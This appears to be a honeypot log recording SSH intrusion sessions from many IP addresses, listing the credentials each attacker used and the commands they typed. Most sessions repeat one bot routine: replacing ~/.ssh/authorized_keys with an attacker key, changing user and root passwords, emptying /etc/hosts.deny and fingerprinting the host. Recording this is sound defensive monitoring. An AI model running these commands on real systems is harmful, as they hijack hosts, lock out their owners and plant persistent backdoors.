$ Enter new UNIX password:
$ echo "dev12345\ngiBd235TowPx\ngiBd235TowPx\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:EpSEnVMIrLP6"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 jade_root_4 (115.190.238.96) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-06-08 00:18 EDT Β· as root/jimster2024#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 pretzel_root_8 (185.176.94.38) β€” Frankfurt am Main, Germany Β· 1 session Β· 20 cmds
2026-06-08 00:11 EDT Β· as dev/dev12345
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "dev12345\nq4TiK92ovpab\nq4TiK92ovpab"|passwd|bash
$ Enter new UNIX password:
$ echo "dev12345\nq4TiK92ovpab\nq4TiK92ovpab\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 autobahn_root_10 (46.249.99.46) β€” Frankfurt am Main, Germany Β· 1 session Β· 20 cmds
2026-06-08 00:05 EDT Β· as admin/temppass
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "temppass\nl5jd3X6B9uH3\nl5jd3X6B9uH3"|passwd|bash
$ Enter new UNIX password:
$ echo "temppass\nl5jd3X6B9uH3\nl5jd3X6B9uH3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_5 (152.32.239.122) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-06-07 23:46 EDT Β· as supernova/supernova
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "supernova\nY6Kit3mNW1a6\nY6Kit3mNW1a6"|passwd|bash
$ Enter new UNIX password:
$ echo "supernova\nY6Kit3mNW1a6\nY6Kit3mNW1a6\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lotus_root_7 (38.76.202.105) β€” Mumbai, India Β· 1 session Β· 19 cmds
2026-06-07 23:16 EDT Β· as root/qwertyuiop123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:HyzYvWFsuWFB"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_29 (31.216.62.250) β€” Tehran, Iran Β· 1 session Β· 20 cmds
2026-06-07 23:13 EDT Β· as systems/systems@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "systems@123\ntcRf2iwiIfxC\ntcRf2iwiIfxC"|passwd|bash
$ Enter new UNIX password:
$ echo "systems@123\ntcRf2iwiIfxC\ntcRf2iwiIfxC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star (165.227.65.239) β€” Clifton, United States Β· 1 session Β· 1 cmd
2026-06-07 22:38 EDT Β· as jimster/jimster2025@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 wraith_root_36 (103.179.172.233) β€” Dich Vong, Vietnam Β· 1 session Β· 19 cmds
2026-06-07 22:31 EDT Β· as root/ahead
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:x6yG4qiB3Z3m"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_6 (119.156.28.157) β€” Khushāb, Pakistan Β· 1 session Β· 20 cmds
2026-06-07 22:08 EDT Β· as cnap/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\na7ghkDDjDneM\na7ghkDDjDneM"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\na7ghkDDjDneM\na7ghkDDjDneM\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_43 (2.134.15.12) β€” Shymkent, Kazakhstan Β· 1 session Β· 20 cmds
2026-06-07 21:29 EDT Β· as user/User
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "User\nn1CYqoqigG5v\nn1CYqoqigG5v"|passwd|bash
$ Enter new UNIX password:
$ echo "User\nn1CYqoqigG5v\nn1CYqoqigG5v\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_3 (101.100.194.181) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-06-07 21:12 EDT Β· as mantis/mantis
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "mantis\nYOx76SdtwKRX\nYOx76SdtwKRX"|passwd|bash
$ Enter new UNIX password:
$ echo "mantis\nYOx76SdtwKRX\nYOx76SdtwKRX\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stein_root_12 (178.105.252.160) β€” Nuremberg, Germany Β· 1 session Β· 1 cmd
2026-06-07 20:52 EDT Β· as root/jimster@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 chai_root_9 (68.183.89.16) β€” Bengaluru, India Β· 1 session Β· 1 cmd
2026-06-07 20:11 EDT Β· as jimster/Admin123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 frost_root (95.188.91.101) β€” Krasnoyarsk, Russia Β· 5 sessions Β· 81 cmds
2026-05-16 15:06 EDT Β· as curl/welltech12, laser/laser, root/1qazxsw21qazxsw2
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "laser\nFwsbEERrToQu\nFwsbEERrToQu"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "laser\nFwsbEERrToQu\nFwsbEERrToQu\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "laser\n2FfymNbC7Cud\n2FfymNbC7Cud"|passwd|bash
$ echo "laser\n2FfymNbC7Cud\n2FfymNbC7Cud\n"|passwd
$ echo "root:2pnjW1SHrMrE"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "welltech12\njYeQbB1MDqof\njYeQbB1MDqof"|passwd|bash
$ echo "welltech12\njYeQbB1MDqof\njYeQbB1MDqof\n"|passwd
🎭 steppe_root_2 (178.176.224.83) β€” Moscow, Russia Β· 1 session Β· 19 cmds
2026-06-07 19:58 EDT Β· as root/Root1234!!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:NOOG1IwrF7I0"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_2 (118.196.86.3) β€” Haidian, China Β· 1 session Β· 20 cmds
2026-06-07 19:56 EDT Β· as a/123qwe
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123qwe\nzJEzxatbQOPk\nzJEzxatbQOPk"|passwd|bash
$ Enter new UNIX password:
$ echo "123qwe\nzJEzxatbQOPk\nzJEzxatbQOPk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 frost_root_3 (85.95.166.40) β€” Saransk, Russia Β· 2 sessions Β· 39 cmds
2026-06-07 19:41 EDT Β· as iptv/1, root/root@12
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "1\nx5KeaxI6mYvm\nx5KeaxI6mYvm"|passwd|bash
$ Enter new UNIX password:
$ echo "1\nx5KeaxI6mYvm\nx5KeaxI6mYvm\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:9JYxxPCvIFow"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 phantom_sol_3 (45.78.204.246) β€” Singapore, Singapore Β· 1 session Β· 6 cmds
2026-06-07 19:46 EDT Β· as root/a1b2c3
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ echo β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
